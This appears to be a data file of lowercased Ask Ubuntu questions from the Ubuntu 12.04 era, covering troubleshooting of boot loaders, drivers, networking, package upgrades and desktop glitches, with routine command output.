183724	menu bar acting weird and critical error when resetting unity - what 's happening ?	i 've been having a weird problem with the full-screen writing app focuswriter on ubuntu 12.04 : when i open focuswriter everything works as it should , when i minimize and maximize it once some of the menus in the menu bar are n't working , when i minimize and maximize one more time non of the menus are working , so when i click file , edit , format , tools , settings or help nothing happens . i 've noticed that the menus in fact does open they 're just invisible so when , for example , i click help and then click a bit below i see the about screen - but i do n't see the actual menu . the behavior is consistent when i repeat the actions , that is minimize/maximize twice . at a loss what to do i tried resetting unity . this is what happened : andreas @ andreas-thinkpad-edge : ~ $ unity -- reset warning : unity currently default profile , so switching to metacity while resetting the values checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x1600004 compiz ( core ) - warn : failed to receive configurenotify event on 0x2e000a5 initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:2680 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed initializing unityshell options ... done compiz ( core ) - warn : unhandled configurenotify on 0xc0009e ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a1 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . warn 2012-09-03 21:08:11 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2012-09-03 21:08:11 unity < unknown > :0 failed to fetch type : ingen sådan grænseflade `` org.ayatana.bamf.window '' på objektet ved stien /org/ayatana/bamf/window48234661 initializing annotate options ... done initializing blur options ... done initializing clone options ... done initializing colorfilter options ... done initializing commands options ... done initializing cube options ... done initializing imgjpeg options ... done initializing kdecompat options ... done initializing mag options ... done initializing neg options ... done initializing obs options ... done initializing opacify options ... done initializing put options ... done initializing resizeinfo options ... done initializing ring options ... done initializing rotate options ... done initializing scaleaddon options ... done initializing screenshot options ... done initializing shift options ... done initializing staticswitcher options ... done initializing switcher options ... done initializing thumbnail options ... done initializing water options ... done initializing winrules options ... done initializing wobbly options ... done error 2012-09-03 21:08:14 unity.glib-gobject < unknown > :0 g_object_unref : assertion `g_is_object ( object ) ' failed setting update `` main_menu_key '' setting update `` run_key '' the process stops here - i waited 30 minutes and nothing happened . what does the critical error mean ? can it be related to the weird behavior of focuswriter ? and in either case : how do i fix it ? thanks !
183725	hp 4510s probook overheating	i am having overheating problems with ubuntu 12.04 . average temperature is approximately 70-74 째c and when skype is turned on it goes nuts over 80 째c . elipse refuses to open for some reason and of course everything is slower than it should be . i also had linux mint 11 installed and same thing happened . strange thing is when running windows , everything is okay and temperature is normal . of course i have googled this issue and found some advices like install jupiter which helped just a bit , installed additional drivers , opened laptop and cleaned it completely , disabled fan always on option from bios . i have also switched from unity to classic old look and still temperature is the same . somehow i think it has something to do with the graphics card but i am all lost now . any advices ? thank you !
183726	network/browser issues after upgrade to 12.04	i let my laptop upgrade to 12.04 . and have no network afterwards . i went through all the articles i could find in google . right now , i can ping google , and yahoo , but not cnn.com for example or anything else . firefox says it ca n't reach google.com or gmail.com ( or anything , not even ip . /etc/network/interfaces dns-nameservers 8.8.8.8 < < < < < added auto lo iface lo inet loopback /etc/dhcp/dhclient.conf # prepend domain-name-servers 8.8.8.8,8.8.4.4 ; prepend domain-name-servers 127.0.0.1 ; < < < < < tried both /etc/networkmanager/networkmanager.conf with and without dns=dnsmasq commented out . i can ping my wireless router and connect to it just fine . have tried proxy/noproxy . this looks like after upgrade to 12.04 - can not connect to network but no answer there . i would hate to do a fresh install . any assistance appreciated .
183727	running ubuntu from usb	i am trying to run ubuntu off of usb . here is what i did : checked usb formatting . confirmed that it is fat32 from instructions on this page i downloaded ( universal usb installer ) . from this page i downloaded ubuntu 32 bit onto my windows pc . i ran the universal usb installer as per the instructions here and successfully ( seemingly ) downloaded everything onto the usb restarted computer ; hit esc . for start up options ; f9 for list of options but then flash drive is not an option . i do n't know what i did wrong but last week i took a class using this same computer where flash drives were provided with ubuntu and i was able to boot right up , no problem . i think i missed a step putting together this usb . any assistance would be appreciated .
183731	how do i prevent nautilus from hiding some file extensions ?	i 've just installed the new version of ubuntu ( 12.04 ) and nautilus seems to hide some file extension . for example in my .local/application , the .desktop extension are not displayed . how to display the true name of files ?
183740	wine : ca n't connect to server	some of the applications i installed through wine need to connect to the internet , but it appears they 're not able to . they produce the following error on such an attempt : ca n't connect to server how do i enable internet access for these applications ? i am running pangolin , 64 bit .
183741	help understanding my hard drive / partitioning situation ... pictures included ! : )	so i have installed windows 7 , and two different distros of linux ... i have read and tried to understand things like `` spanned '' `` extended '' `` primary '' `` swap '' `` dev/dev2/ '' `` grub '' `` windows boot loader/manager '' etc ... . i have a very very limited understanding of all of it ! : ) i am trying to figure out how to get all os boot options on one boot manager ( i 'm thinking it will be grub ) , because at this point when i turn on my computer , i basically get two booting options ( excluding the memtest options etc ) ... one options is to boot one of my linux distros and the second option is to boot my windows 7 . when i go with the first option , linux boots up ... when i go with the second windows 7 option , i get the `` windows boot manager screen '' and i can choose windows 7 or my other installation of linux ( ubuntu ) ... in addition , i did not have swap partition from my first installation of linux , i created it during the installation of my second distro ... this is a lot of info for me , but i 'm guessing that you linux gurus , pretty much understand what is going on ! hope my question makes sense.. i will try and simplify ... can i get all 3 os 's optioned to boot from one grub ? can i get both linux distros to use one swap file ( i have seen this possible in other threads , but because of how my disk is partitioned , i dont know if i can do this ) i hope that i dont have to start all over installing one after the other . ive got some pics that may help understand my hard drive situation ! thanks guys ! : ) edit ... i had some pics , but im a new member.. so cant post them ... : ( here is a description of the pics ... incase i can email them or post later . [ grub ] [ 3 ] first screen i come to after turning on computer ... `` ubuntu with linux 3.2.6 '' ( highlighted ) fires up linux perfectly ... other choice at bottom of list `` windows 7 ( loader ) ( on dev/sda1 ) ... brings me to the next picture below.. windows boot manager [ win boot mngr ] [ 6 ] both options here load the os selected [ disk manager windows ] [ 1 ] picture of my hard drive situation through windows disk manager utility [ gparted ] [ 2 ] picture of my hard drive situation through `` gparted '' [ mycomp ] [ 4 ] picture of my hard drive situation through `` my computer '' [ paragon ] [ 5 ] one last pic of my hard drive situation through the eyes of `` paragon ''
183743	ca n't reset backintime snapshot path	i 've been using backintime with ubuntu 12.04 . the disk i was saving to is no longer available . backintime insists that i bring it back . ( it says `` ca n't find snapshots folder . if it is on a removable drive please plug it and then press ok '' ) no matter what i 've tried , i ca n't seem to get beyond this point . i 've even tried removing backintime and re-installing it . the problem persists . how can i change the snapshots path without the missing disk ?
183744	update manager does n't work	often the update manager says i do n't have an internet connection and stops working . i check and do have access to the internet ... . i think it might have something to do with updating google chrome because it usually does this when updating chrome .
183748	subversion 1.7 on 12.04 precise : libsasl error , compiling from source ?	background : i am a longtime gentoo user , and this is my first time using ubuntu ( installed on a vm to avoid compiling everything from scratch ) . i am familiar with a linux environment but somewhat unfamiliar with ubuntu . i am trying to install subversion 1.7 on ubuntu and saw this post : where can i find a subversion 1.7 binary ? the above post recommends using the ppa ppa : dominik-stadler/subversion-1.7 . i also found the ppa ppa : svn/ppa from another link . they both cause problems for me . the issue is that any svn operation using the remote server causes the following error : svn : e170001 : unable to connect to a repository at url 'svn+ssh : //my_repo' svn : e170001 : could not create sasl context : generic failure : no such file or directory this seems to arise from a recent bug involving svn dependency on the libsasl library , as documented by debian users here : http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=683555 and also mac users here : https : //trac.macports.org/ticket/34861 resolution seems to involve either updating the cyrus-sasl or libsasl library to a newer version ( neither of which is in the latest apt packages ) , or compiling subversion without sasl support . as a gentoo user i started looking into how to compile svn from source , but it looks way more complicated on ubuntu than i 'm used to and i 'm not sure what the canonical way is . my questions : is there an obvious fix for this problem that i am overlooking ? is there a way to update the dependencies for svn to something that works through using synaptic or apt-get ? if i want to compile from scratch , how do i use the sources in the ppa instead of downloading my own source copy ( i.e . the ppa has both binary and sources ? ) edit : this seems to be caused by this bug in sasl i changed /etc/hostname without updating /etc/hosts , and this caused the error . fixing /etc/hosts allowed me to get around the error for now without having to compile svn from scratch or finding a patched version of cyrus-sasl2 .
183749	after installing windows xp i ca n't boot into ubuntu 12.04 lts	i know that this issue may have been happened to many people and answered many times . for some reason , i had to install windows xp beside ubuntu 12.04 lts . once i did that , i 'm no longer able to log on to my ubuntu . the booting list screen does n't show up . i tried some ways to fix that , one was to try boot repair ( of course after opening ubuntu live from a usb ) , however , the program did n't open after the installation had finished ! ! so how can i fix that ? i hope you guys stick a little with my problem until it is solved
183756	how to make backlight work on acer 5732z ?	i want to run 12.04 on my acer aspire 5732z . i know from research that these computers have issues with the backlight on ubuntu . so i tried a couple of solutions : the sudo lightdm restart method . i get no change at all . the sudo setpci -s 00:02.0 f4.b=30 method . this so far has been the most effective . i first tried it in the f1 console , right away i get the screen back , problem is going back to the desktop it goes back to being black . so i tried it from a terminal window and it works as well but as soon as i unplug my external monitor the screen turns black again and does n't come back . if i plug the monitor back in the screen stays black and the only thing i see is the mouse pointer . from here i go back into console ( which i am able to see ) and reboot from there . the sudo sed -i 's/grub_cmdline_linux= '' '' /grub_cmdline_linux= '' acpi_osi=linux '' /g /etc/default/grub method . this one i got no instant change and after reboot still no change . i 'm open to pretty much any suggestions you may have . edit : ok well i figured it out ( more or less ) i got it working the only problem is that when i used an external monitor the screen goes back black and i have to use the command again . but other than that got it working what i had to do was simply put the command into rc.local . i figure what i have to do to fix my external monitor problem is find the file that is executed when the screen state changes ( monitor being plugged , screen turning on etc ) and add the command into there . there is also another strange problem , my screen brightness is inverted i.e . when i put the brightness setting up the screen gets darker and vis versa . this is only a minor annoyance that i can live with but if anyone knows a fix feel free to share . looking forward to discussing with you all around the forum .
183763	how can i view google tasks ?	i 'm using ubuntu 12 , and i have my google account added as an `` online account '' so it shows up in evolution . however there does n't seem to be support for gmail tasks yet.. is there any program to easily view my google tasks ? the only way i can seem to view the task list from my computer is through the web browser which is not very convenient .
183765	ubuntu 12.04 installer does not recognize windows 7	i recently purchased an asus n56vz-es71 laptop which came with windows 7 home premium installed on it . i wish to dual boot windows 7 and ubuntu 12.04 on it . i shrank the hard drive partitions to leave about 150 gb unallocated for ubuntu 12.04 . when i boot the live cd of ubuntu and attempt to install , the installer does not recognize any other operating systems . through reading a few questions , i have found that this is due to a gpt partitioning table that windows uses . i ran boot-repair as per other threads ' suggestions . this was my output : http : //paste.ubuntu.com/1176988/ i suppose my question is : how do i proceed in order to get the installer to recognize windows , so that i do n't have to erase the current partition table and can get a safe install ? thanks in advance .
183771	close active window from terminal	do you know how to do it ? i know how to do it from my keyboard ( alt+f4 ) , i know how to do it with my mouse ( click that x ) , and i also know that kill x should kill the process with the id x ( and killall y should kill the process named y ) . but i want to know how to kill the active window from terminal . therefore , from what i stated above , a valid answer would also be to get the id of the active window . right now i 'm implementing this function from xte ( simulating alt+f4 ) , but i 'd like to know if there 's a way that does n't imply installing another app . thank you all . edit . here is the full script . first you enable 'show mouse when ctrl is pressed ' , then you add this script to commands in compizconfig and binding to top-right corner . when you touch the top-right corner , a small notification around the mouse is shown . if you do nothing , the active window will close after 1 second . however , if you touch the corner again within the second , the active window will not be closed . xte 'key control_r ' ; if [ -f ~/.fcont ] ; then rm -f -r ~/.fcont ; else touch ~/.fcont ; sleep 1 ; if [ -f ~/.fcont ] ; then xkill -id `xprop -root _net_active_window | cut -d\ # -f2` ; rm -f -r ~/.fcont ; fi fi note that i still use the xte app named before since this question i made some time ago was never answered .
183772	macbook wo n't read disk	i have a macbook that i erased the original ios on to restart with ubuntu but when i put in my home burned disk it does n't read it correctly and makes loud clicking noises . i burned it on a tdk cd-r80 700 mb cd from windows 7 and even did the confirm to make sure it burned correctly . it has never read cds like that before , so it 's weird . should i just make another cd ? or is there something wrong with the macbook .
183774	how can i open pdfs in firefox using evince ( not acrobat ) ?	i already installed mozplugger sudo apt-get install mozplugger then i changed the pdf part of /etc/mozpluggerrc into the following : application/pdf : pdf : pdf file application/x-pdf : pdf : pdf file text/pdf : pdf : pdf file text/x-pdf : pdf : pdf file repeat noisy swallow ( evince ) fill : evince `` $ file '' acroread ( ) repeat noisy swallow ( kpdf ) fill : kpdf `` $ file '' repeat noisy swallow ( xpdf ) fill : xpdf -g +9000+9000 `` $ file '' repeat noisy swallow ( okular ) fill : okular `` $ file '' gv ( ) repeat noisy fill exits : evince `` $ file '' of course i setted the application settings for pdf to mozplugger . sometimes it works but mostly it dos n't . i do n't know why . what do i have to do ?
183775	how do i open a terminal ?	i just got ubuntu running on my computer and now i am ready to write a program ... but i ca n't figure out how to open a command terminal . i guess i do n't know where to find which version i am running either . any help would be appreciated . thank you .
183779	amd/amd gpu switching	i have two gpu 's in my laptop , both of which are amd . whenever i use the catalyst control centre to change the gpu , nothing changes after reboot . in fact , when i do the fglrxinfo command the terminal only reports seeing one gpu , the integrated one ( hd 4250 ) . the dedicated one ( mobility hd5470 ) goes unnoticed and i ca n't seem to use that gpu at all . i really do n't want to use the open source drivers because i 've found there generally slower than the proprietary , but the proprietary does n't seem to work either . any help is appreciated .
183785	is there a general strategy to follow when debugging a non-working microphone ?	i am having no luck using the microphone of my dell xps m1530 in ubuntu 12.04 . applications such as vlc or skype that can take audio input receive silence ( though no error or other diagnostic is generated by the application ) . what i 'm really interested in is : is there a general approach that works for debugging sound issues ? where do you start looking ? and , most specifically : what are all the links in the chain between my voice and the sound recording application that can potentially be broken ? in case it might help in this particular case , here 's the usual dump of information : lspci : 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) dmesg | grep -c 2 snd : [ 27.762737 ] [ drm ] initialized nouveau 0.0.16 20090420 for 0000:01:00.0 on minor 0 [ 27.764101 ] input : dell wmi hotkeys as /devices/virtual/input/input10 [ 27.798184 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 21 ( level , low ) - > irq 21 [ 27.798267 ] snd_hda_intel 0000:00:1b.0 : irq 47 for msi/msi-x [ 27.798303 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 [ 27.827935 ] cfg80211 : world regulatory domain updated : [ 27.827940 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) grep -r snd /etc/ /etc/apparmor.d/abstractions/audio : /dev/snd/* rw , /etc/default/alsa : # `` snd-cs46xx '' stop sound processes and remove the snd-cs46xx module /etc/modprobe.d/alsa-base.conf : install sound-slot-0 /sbin/modprobe snd-card-0 /etc/modprobe.d/alsa-base.conf : install sound-slot-1 /sbin/modprobe snd-card-1 /etc/modprobe.d/alsa-base.conf : install sound-slot-2 /sbin/modprobe snd-card-2 /etc/modprobe.d/alsa-base.conf : install sound-slot-3 /sbin/modprobe snd-card-3 /etc/modprobe.d/alsa-base.conf : install sound-slot-4 /sbin/modprobe snd-card-4 /etc/modprobe.d/alsa-base.conf : install sound-slot-5 /sbin/modprobe snd-card-5 /etc/modprobe.d/alsa-base.conf : install sound-slot-6 /sbin/modprobe snd-card-6 /etc/modprobe.d/alsa-base.conf : install sound-slot-7 /sbin/modprobe snd-card-7 /etc/modprobe.d/alsa-base.conf : install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } /etc/modprobe.d/alsa-base.conf : install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } /etc/modprobe.d/alsa-base.conf : install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } /etc/modprobe.d/alsa-base.conf : install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } /etc/modprobe.d/alsa-base.conf : install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } /etc/modprobe.d/alsa-base.conf : install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } /etc/modprobe.d/alsa-base.conf : install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } /etc/modprobe.d/alsa-base.conf : options snd-atiixp-modem index=-2 /etc/modprobe.d/alsa-base.conf : options snd-intel8x0m index=-2 /etc/modprobe.d/alsa-base.conf : options snd-via82xx-modem index=-2 /etc/modprobe.d/alsa-base.conf : options snd-usb-audio index=-2 /etc/modprobe.d/alsa-base.conf : options snd-usb-caiaq index=-2 /etc/modprobe.d/alsa-base.conf : options snd-usb-ua101 index=-2 /etc/modprobe.d/alsa-base.conf : options snd-usb-us122l index=-2 /etc/modprobe.d/alsa-base.conf : options snd-usb-usx2y index=-2 /etc/modprobe.d/alsa-base.conf : # ubuntu # 62691 , enable mpu for snd-cmipci /etc/modprobe.d/alsa-base.conf : options snd-cmipci mpu_port=0x330 fm_port=0x388 /etc/modprobe.d/alsa-base.conf : # keep snd-pcsp from being loaded as first soundcard /etc/modprobe.d/alsa-base.conf : options snd-pcsp index=-2 /etc/modprobe.d/alsa-base.conf : # keep snd-usb-audio from beeing loaded as first soundcard /etc/modprobe.d/alsa-base.conf : options snd-usb-audio index=-2 /etc/modprobe.d/blacklist-modem.conf : # blacklist snd-atiixp-modem /etc/modprobe.d/blacklist-modem.conf : # blacklist snd-intel8x0m /etc/modprobe.d/blacklist-modem.conf : # blacklist snd-via82xx-modem /etc/modprobe.d/blacklist.conf : # snd_intel8x0m can interfere with snd_intel8x0 , does n't seem to support much /etc/modprobe.d/blacklist.conf : blacklist snd_intel8x0m /etc/modprobe.d/blacklist.conf : blacklist snd_aw2 /etc/modprobe.d/blacklist.conf : blacklist snd_pcsp
183786	bash script to login to webpage	i am trying to login into this page but i can not for the life of me get it to work . i have to login to this site when i connect to my school 's wifi in order to start a session . so far ive tried to use bash and curl to achieve this but have only achieved to give myself a headache . will curl work or am i on the wrong track ? any help is greatly appreciated ! thanks , n here 's what i tried : curl -- cookie-jar cjar -- output /dev/null http : //campus.fsu.edu/webapps/login/ curl -- cookie cjar -- cookie-jar cjar \ -- data 'username=foo ' \ -- data 'password=bar ' \ -- data 'service=http : //campus.fsu.edu/webapps/login/ ' \ -- data 'loginurl=http : //campus.fsu.edu/webapps/login/bb_bb60/logincas.jsp ' \ -- location \ -- output ~/loginresult.html \ http : //campus.fsu.edu/webapps/login/
183788	windows applications on ubuntu	i want to download and begin using ubuntu linux on my pc , but the only thing i 'm considering is if i 'll be able to run my windows applications especially the cad apps such as autocad , archicad , and atlantis studio on it .
183789	i think i killed my portable hd will trying to make ubuntu bootable from it . how to undo ?	i have osx . my hd appears as two drives ; one formatted for osx , and the other fat32 for everything . note : i am a complete terminal noob . i followed the how to create a bootable usb stick on os x page . i installed it to the mac formatted partition , which i 'm 95 % sure was a mistake . i was thinking more in terms of free space than proper format . anyway , it does n't boot , and i ca n't get the hd to appear when i plug it back into osx . i have no idea how to undo what i did in terminal . any ideas ?
183794	second monitor problem in 12.04	i just installed 12.04.1 on an hp pavilion dv6-2106ea . i have a second monitor plugged in the vga port which was detected during the install ( and used as a duplicate display ) . now the install is complete it is not being detected . according to system settings | system | details | graphics i have an `` unknown '' driver , but system settings | hardware | additional drivers says i have nvidia accelerated graphics driver ( currently the recommended release , but the other has the same effect ) . this may be a duplicate of the unanswered unable to use second monitor any help would be appreciated .
183796	ubuntu 11.10 performance problems	i have recently installed ubuntu 11.10 in my hp pavilion t440m ( this is a pc , not a laptop ; with extra ram , now 1.5g ) and i am experiencing some problems with my performance : one clear example of this is that having two tabs opened on firefox , only gmail and facebook , makes it use up to 80 % or more of the cpu , and the change of tabs sometimes takes too long or gets stuck for a few seconds . at first i had installed 12.04 , but apparently the 32 bits version had some problems with the recognition of some nvidia cards or something like that . i have now reinstalled this older version and installed the drivers ( using `` additional drivers '' interface ) but i suspect that they may be failing somewhere else , because i think i meet all the hardware requirements for using ubuntu comfortably and yet it seems to be working awfully ( i am using the gnome desktop , without special effects ) . am i missing something ? is there any way to check that the drivers are working properly ? what else could be my problem ? should you need any more information please let me know ( i think that other than the ram , the computer should have all the specifications of the model )
183799	fix windows mbr using ubuntu live cd and ms-sys tool	i 'm trying to fix the mbr using ubuntu live cd . i already have the ms-sys installed but from the threads that i saw , i 'm not completely sure in which /dev i should execute the command : sudo ms-sys -- mbr7 /dev/ ? ? ? ( is it mbr7 the correct option when using windows 7 ? ) ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1f205b1f device boot start end blocks id system /dev/sda1 * 38 38 0 0 empty /dev/sda2 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda3 206848 155854847 77824000 7 hpfs/ntfs/exfat /dev/sda4 155854848 625137663 234641408 7 hpfs/ntfs/exfat ubuntu @ ubuntu : ~ $ why is /dev/sda1 empty ? i 'm trying to fix the mbr because i 'm getting a black screen when trying to load the operating system .
183800	xubuntu shared folder in vmware	how do i share folders between my windows partition and xubuntu 12.04 installed in vmware ?
183804	how to fix `` error : unknown file system '' on all available partitions	i 've had a running problem with removing linux from my windows 7 laptop . initially , it was installed as a dual-boot , and worked well . to remove , i deleted the partitions on my laptop . this removed grub , and i was left with needing to enter : set root= ... set prefix= ... insmod normal normal each restart . i did n't restore the windows boot-loader and have since re-partitioned my drive . now , upon reaching the command prompt screen , an ls query showshd0 , with three partitions , but none of them have a recognizable boot-loader as each returns with error : unknown file system . booting from a windows 7 rescue disk does n't seem to work , as it sends me to the same command prompt terminal . all i 'm looking to do is restore the boot-loader , either grub or windows 7 . any help would be appreciated . thanks in advance .
183814	how to start up rsyslog automatically ?	check current status of rsyslog $ chkconfig -- list rsyslog rsyslog 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off start up rsyslog at some levels $ sudo chkconfig -- level 35 rsyslog on it outputs these information : insserv : warning : script 'plymouth-stop ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `plymouth-stop' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `plymouth-stop' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'failsafe-x ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `failsafe-x' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `failsafe-x' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'udevtrigger ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `udevtrigger' check current status of rsyslog again $ chkconfig -- list rsyslog rsyslog 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off i am a novice . please show me how to use rsyslog from beginning .
183820	ubuntu 12.04 64 bit does n't work on a win7 with check point full disk encryption	i installed 12.04 64bit with the wubi installer on a windows 7 with check point full disk encryption . the wubi installer runs without any trouble selecting the compatibility mode with windows xp and as administrator . the problem is that after the installation is complete and the reboot done , when you restart the system , there 's no option to start ubuntu instead of windows . i recently installed ubuntu on other windows 7 machines without any problem . but those laptops do n't have the check point full disk encryption . and when you restart the system you have the option to start in ubuntu . if somebody has resolved this issue please share .
183825	i have 6 updates that wo n't install on ubuntu 12.04 ?	i 'm an ubuntu novice , so any help here is greatly appreciated . i 'm running 12.04 , and i have six updates that just wo n't install . i 've tried update manager , sudo apt-get upgrade , and sudo apt-get update . nothing has worked so far . here 's my output after sudo apt-get dist-upgrade : reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be upgraded : fglrx fglrx-amdcccle fglrx-dev linux-generic-pae linux-image-3.2.0-24-generic-pae linux-image-generic-pae 6 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 11 not fully installed or removed . need to get 0 b/83.0 mb of archives . after this operation , 53.1 mb of additional disk space will be used . do you want to continue [ y/n ] ? y setting up linux-image-3.2.0-24-generic-pae ( 3.2.0-24.37 ) ... running depmod . sh : 1 : /usr/sbin/update-initramfs : not found failed to create initrd image . dpkg : error processing linux-image-3.2.0-24-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-3.2.0-27-generic-pae ( 3.2.0-27.43 ) ... running depmod . sh : 1 : /usr/sbin/update-initramfs : not found failed to create initrd image . dpkg : error processing linux-image-3.2.0-27-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-3.2.0-29-generic-pae ( 3.2.0-29.46 ) ... running depmod . sh : 1 : /usr/sbin/update-initramfs : not found failed to create initrd image . dpkg : error processing linux-image-3.2.0-29-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up udev ( 175-0ubuntu9.1 ) ... no apport report written because maxreports is reached already udev stop/waiting udev start/running , process 4840 /var/lib/dpkg/info/udev.postinst : 87 : /var/lib/dpkg/info/udev.postinst : update- initramfs : not found dpkg : error processing udev ( -- configure ) : subprocess installed post-installation script returned error exit status 127 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of xserver-xorg-core : xserver-xorg-core depends on udev ( > = 149 ) ; however : package udev is not configured yet . dpkg : error processing xserver-xorg-core ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of fglrx : fglrx depends on xserver-xorg-core ; however : package xserver-xorg-core is not configured yet . dpkg : error processing fglrx ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of fglrx-amdcccle : fglrx-amdcccle depends on fglrx ; however : package fglrx is not configured yet . dpkg : error processing fglrx-amdcccle ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-24-generic-pae ; however : package linux-image-3.2.0-24-generic-pae is not configured yet . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-image-generic-pae ( = 3.2.0.24.26 ) ; however : package linux-image-generic-pae is not configured yet . dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of xserver-xorg-video-intel : xserver-xorg-video-intel depends on xorg-video-abi-11 ; however : package xorg-video-abi-11 is not installed . package xserver-xorg-core which provides xorg-video-abi-11 is not configured yet . xserver-xorg-video-intel depends on xserver-xorg-core ( > = 2:1.10.99.901 ) ; however : package xserver-xorg-core is not configured yet . dpkg : error processing xserver-xorg-video-intel ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of fglrx-dev : fglrx-dev depends on fglrx ; however : package fglrx is not configured yet . dpkg : error processing fglrx-dev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.2.0-24-generic-pae linux-image-3.2.0-27-generic-pae linux-image-3.2.0-29-generic-pae udev xserver-xorg-core fglrx fglrx-amdcccle linux-image-generic-pae linux-generic-pae xserver-xorg-video-intel fglrx-dev e : sub-process /usr/bin/dpkg returned an error code ( 1 )
183837	how do i save a file to a subfolder of home ?	my painting app ( gimp ) keeps it brushes in a subfolder of home . i want to save a brush i have created in the same place , but the save file as dialog box ca n't find home .
183838	12.04 is slow after deleting xauthority and reinstalling xorg ?	i had a problem logging into the system and found a solution here . but now i have another , after this is the system is slow . in my opinion it goes with the re-installation of xorg . when i try to open something it takes 3 times more time . can somebody help me but , without re-installing the system , it is the last solution ?
183843	ubuntu ( wubi ) wo n't boot ; stuck at grub command line	ubuntu installed by wubi works fine on first boot . however , on later boots , it gets stuck at grub command line . i can input . i can choose to exit and boot windows 7 . what should i do ?
183847	how do i make /dev/sda3 my boot partition ?	i have three ntfs partitions as specified below . device uuid boot /dev/sda1 2af4c64ff4c61cc7 * /dev/sda2 1c58cb9c58cb72d6 /dev/sda3 c8ece40bece3f21c when i boot to ubuntu 12.04 i get the below error error : no such device 262047ac20478233 error : file not found error : no such disk error : you need to load the kernel first press any key to continue 262047ac20478233 is referring to a partition from which i have captured ubuntu using imagex . by using the 'e ' option to edit the commands before booting , i change the uuid to c8ece40bece3f21c ( /dev/sda3 ) which has the ubuntu 12.04 os ans then it boots up all fine . how can i change /dev/sda3 as the default boot partition so that i donât have to edit the uuid manually every time i start my machine . i am new to ubuntu . please advise .
